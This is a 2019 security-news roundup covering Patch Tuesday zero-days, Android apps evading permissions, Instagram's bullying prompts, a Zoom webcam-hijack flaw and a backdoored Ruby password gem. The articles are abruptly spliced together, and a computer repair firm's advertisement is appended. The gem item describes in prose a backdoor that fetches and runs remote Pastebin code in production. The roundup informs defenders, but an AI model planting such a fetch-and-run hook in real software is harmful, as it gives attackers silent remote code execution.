July 10, 2019

Patch Tuesday this month offers fixes for a total of 77
vulnerabilities, of which 15 are marked critical, rounded out by two zero-day
flaws just to make things interesting.

However, with an
operating system estate as large as Microsoft’s these days, numbers don’t tell
the whole story.

A good example of
this is Microsoft’s Edge and Internet Explorer 11 browsers, which, including
two overlaps, are patched for seven and six flaws respectively, all rated
critical, and all remote code execution (RCE) flaws in the most vulnerable part
of a browser, the web scripting engine.

It’s worth
drawing attention to this because it’s easy to overlook the security of
software bundled in Windows 10 which some users either use infrequently, or do
not use at all.

As explained in
previous coverage, this is particularly the case with IE 11, which many
Windows 10 users don’t even realise is there but hangs around to maintain
backwards compatibility. Compare that to Windows 10 64-bit version 1903, which
earns only one critical, CVE-2019-1102.

Zero days

The two zero days
are CVE-2019-0880
and CVE-2019-1132,
both Elevation of Privilege (EoP) flaws currently being exploited in the wild
by unnamed threat groups. The first affects the Windows splwow64 print spooler
while the second is in Win32k.

Android apps must
ask for permission to access sensitive resources on the phone, like the GPS,
the camera, or the user’s contacts data. When you say that an app can’t access
your location data, the operating system can prevent it from doing so because
it runs the app in its own sandbox. That also stops the app in question
interacting with other apps.

Sidestepping
permissions

The researchers
analysed over 88,000 Android apps to see what data they transmitted from the
phone, and where they sent it. They ran the test on a variety of Android
systems, with the most recent being Android Pie (2018). They matched this
against the permissions that the user had granted the app to see if apps were
harvesting data that they shouldn’t be. They found dozens of apps transmitting
data they shouldn’t have accessed, along with thousands more containing the
code to do so. They reverse engineered the code and found two main methods for
circumventing permissions protections.

Instagram on
Monday announced
that it’s now using artificial intelligence (AI) to detect speech that looks
like bullying and that it will interrupt users before they post, asking if they
might want to stop and think about it first.

The
Facebook-owned platform, hugely popular with teens, also plans to soon test a
new feature called “Restrict” that will enable users to hide comments from
specific users without letting them know that they’ve been muted.

In the blog post,
Instagram chief executive Adam Mosseri said the company “could do more” to stop
bullying and help out its victims:

We can do more to
prevent bullying from happening on Instagram, and we can do more to empower the
targets of bullying to stand up for themselves.

These tools are
grounded in a deep understanding of how people bully each other and how they
respond to bullying on Instagram, but they’re only two steps on a longer path.

Think before
you post

Instagram posted
one example of what would-be bullies are going to see if its AI interprets
their comments as offensive: a user who types “you are so ugly and stupid” gets
interrupted with a notice saying: “Are you sure you want to post this? Learn
more”.

If the user taps
“learn more”, they get this notice: “We are asking people to rethink comments
that seem similar to others that have been reported.”

Zoom, a company that sells video conferencing
software for the business market, is tweaking the app to fix a vulnerability in
its software that allows malicious websites to force users into a Zoom call
with the webcam turned on.

The flaw was
discovered by security researcher Jonathan Leitschuh, who documented it in a
blog post on Monday.

He said that
initially, the vulnerability would have also allowed any webpage to inflict a
denial of service (DoS) attack on a Mac by repeatedly forcing a user onto an
invalid call. But that DoS vulnerability – CVE-2019-13449
– was fixed in version 4.4.2 of the macOS client.

In discussions
with the Zoom team over the past few weeks, Leitschuh said that Zoom had
proposed a fix to the hijacking vulnerability: namely, digitally signing
requests from websites that are made to the client.

But the
researcher said that wouldn’t have solved the problem, given that an attacker
would be able to set up a server to make requests to the Zoom site in order to
acquire a valid digital signature before contacting the client.

Note.The original version of this article
stated that this flaw was specific to Zoom on the Mac, but Jonathan Leitschuh
has confirmed
in a tweet that this issue can affect Windows users too. See below for how
to prevent Zoom turning on your camera by default when you join a meeting.
[Updated 2019-07-09T18:20Z]

An eagle-eyed
developer has discovered
a backdoor recently sneaked into a library (or ‘gem’) used by Ruby on Rails
(RoR) web apps to check password strength.

A close shave,
then. While the Ruby scripting language and RoR aren’t as popular as they once
were, they’re still embedded in numerous enterprise development environments,
many of which might have used the default library, strong_password, in its
infected version 0.0.7.

The discovery
came about after Epion Health developer, Tute
Costa, noticed something unusual when carefully updating a family of
libraries used by his company’s dev to fix bugs and security vulnerabilities.

When he looked at
the strong_password gem on RubyGems.org, he couldn’t locate a changelog
explaining how it got to the updated version from 0.0.6, an event which
happened on 25 June 2019.

The previous
GitHub version had been updated in October 2018. Comparing the two versions, he
noticed the mystery 0.0.7 version embedded a download link which:

Fetches and
runs the code stored in a pastebin.com, only if running in production, with an
empty exception handling that ignores any error it may raise.

The backdoor
would download code from the Pastebin address for production sites, giving the
attackers the power of remote code execution, silently hijacking any websites
unfortunate to have updated to the rogue strong_password gem.

ACS

Centrally located in Winter Haven, we serve residential and business clients in and around Polk County.

9 Camellia Drive
Winter Haven, FL 33880863-229-4244

Our Promise to You

Plain language, no tech-talk

We will never try to over-sell you a product you don't need.

Advanced Computer Services of Central Florida is your local, hometown computer service and repair company that can do more than just fix your PC. We offer highly skilled professionals who can be counted on to give you sound advice on upgrades, software and hardware, commercial & residential networks, hardwire or secure wireless.